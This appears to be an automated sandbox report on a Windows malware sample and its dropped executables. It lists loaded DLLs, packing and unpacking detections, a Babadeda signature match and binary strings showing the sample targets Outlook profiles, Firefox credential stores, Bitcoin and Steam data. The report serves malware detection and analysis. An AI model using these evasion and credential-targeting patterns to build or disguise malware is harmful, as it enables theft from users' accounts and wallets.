Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: apphelp.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: winmm.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: wldp.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: propsys.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: profapi.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: edputil.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: urlmon.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: iertutil.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: srvcli.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: netutils.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: sspicli.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: wintypes.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: appresolver.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: slc.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: userenv.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: sppc.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: pcacli.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: mpr.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Google Chrome.lnk.26.dr	LNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe
Source: Google Drive.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb61252224y source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.inisP~ source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbes source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831BSOFTWARE\WOW6432Node\Valve\Steams source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb612522248Software\Bitcoin\Bitcoin-Qtp source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yoboy:R;.tezanaz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Unpacked PE file: 5.2.RoamingBKKFHIEGDH.exe.a50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Unpacked PE file: 8.2.RoamingAEGIJKEHCA.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 9.2.axplong.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 10.2.axplong.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 15.2.explorti.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 16.2.explorti.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 22.2.ba77748b9b.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yoboy:R;.tezanaz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 46.2.ba77748b9b.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yoboy:R;.tezanaz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 22.2.ba77748b9b.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ead6a72944.exe	Unpacked PE file: 28.2.ead6a72944.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 46.2.ba77748b9b.exe.400000.0.unpack

Yara detected Babadeda

Source: Yara match	File source: 28.2.ead6a72944.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.ead6a72944.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\1000003002\ead6a72944.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe, type: DROPPED

Binary contains a suspicious time stamp

Source: buildred[1].exe.20.dr

Static PE information: 0xF4A21C47 [Fri Jan 22 01:32:55 2100 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_004195E0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: PharmaciesDetection[1].exe.20.dr	Static PE information: real checksum: 0x0 should be: 0xdf9f4
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: real checksum: 0x1d4c28 should be: 0x1d2f04
Source: explorti.exe.8.dr	Static PE information: real checksum: 0x1d4c28 should be: 0x1d2f04
Source: buildred[1].exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x56436
Source: random[1].exe0.19.dr	Static PE information: real checksum: 0x0 should be: 0x22727
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
Source: build2[1].exe.20.dr	Static PE information: real checksum: 0x2a71a3 should be: 0x2ab10a
Source: buildred.exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x56436
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
Source: build2.exe.20.dr	Static PE information: real checksum: 0x2a71a3 should be: 0x2ab10a
Source: axplong.exe.5.dr	Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
Source: PharmaciesDetection.exe.20.dr	Static PE information: real checksum: 0x0 should be: 0xdf9f4
Source: enter[1].exe.0.dr	Static PE information: real checksum: 0x1d4c28 should be: 0x1d2f04
Source: ead6a72944.exe.19.dr	Static PE information: real checksum: 0x0 should be: 0x22727

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name: .yoboy
Source: file.exe	Static PE information: section name: .tezanaz
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: etmksbbt
Source: random[1].exe.0.dr	Static PE information: section name: iosnleeh
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: .idata
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: etmksbbt
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: iosnleeh
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: .taggant
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name: .idata
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name: owfltkii
Source: enter[1].exe.0.dr	Static PE information: section name: lwtisuou
Source: enter[1].exe.0.dr	Static PE information: section name: .taggant
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: .idata
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: owfltkii
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: lwtisuou
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: .taggant
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: .idata
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: etmksbbt
Source: axplong.exe.5.dr	Static PE information: section name: iosnleeh
Source: axplong.exe.5.dr	Static PE information: section name: .taggant
Source: explorti.exe.8.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name: .idata
Source: explorti.exe.8.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name: owfltkii
Source: explorti.exe.8.dr	Static PE information: section name: lwtisuou
Source: explorti.exe.8.dr	Static PE information: section name: .taggant
Source: random[1].exe.19.dr	Static PE information: section name: .yoboy
Source: random[1].exe.19.dr	Static PE information: section name: .tezanaz
Source: ba77748b9b.exe.19.dr	Static PE information: section name: .yoboy
Source: ba77748b9b.exe.19.dr	Static PE information: section name: .tezanaz
Source: random[1].exe0.19.dr	Static PE information: section name: .code
Source: ead6a72944.exe.19.dr	Static PE information: section name: .code
Source: build2[1].exe.20.dr	Static PE information: section name: .xdata
Source: build2.exe.20.dr	Static PE information: section name: .xdata

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041A9F5 push ecx; ret		0_2_0041AA08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70B536 push ecx; ret		0_2_6C70B549

Source: file.exe	Static PE information: section name: .text entropy: 7.821310507065361
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.979174049479235
Source: random[1].exe.0.dr	Static PE information: section name: etmksbbt entropy: 7.953652307689506
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: entropy: 7.979174049479235
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: etmksbbt entropy: 7.953652307689506
Source: enter[1].exe.0.dr	Static PE information: section name: entropy: 7.983907263958997
Source: enter[1].exe.0.dr	Static PE information: section name: owfltkii entropy: 7.952293456339948
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: entropy: 7.983907263958997
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: owfltkii entropy: 7.952293456339948
Source: axplong.exe.5.dr	Static PE information: section name: entropy: 7.979174049479235
Source: axplong.exe.5.dr	Static PE information: section name: etmksbbt entropy: 7.953652307689506
Source: explorti.exe.8.dr	Static PE information: section name: entropy: 7.983907263958997
Source: explorti.exe.8.dr	Static PE information: section name: owfltkii entropy: 7.952293456339948
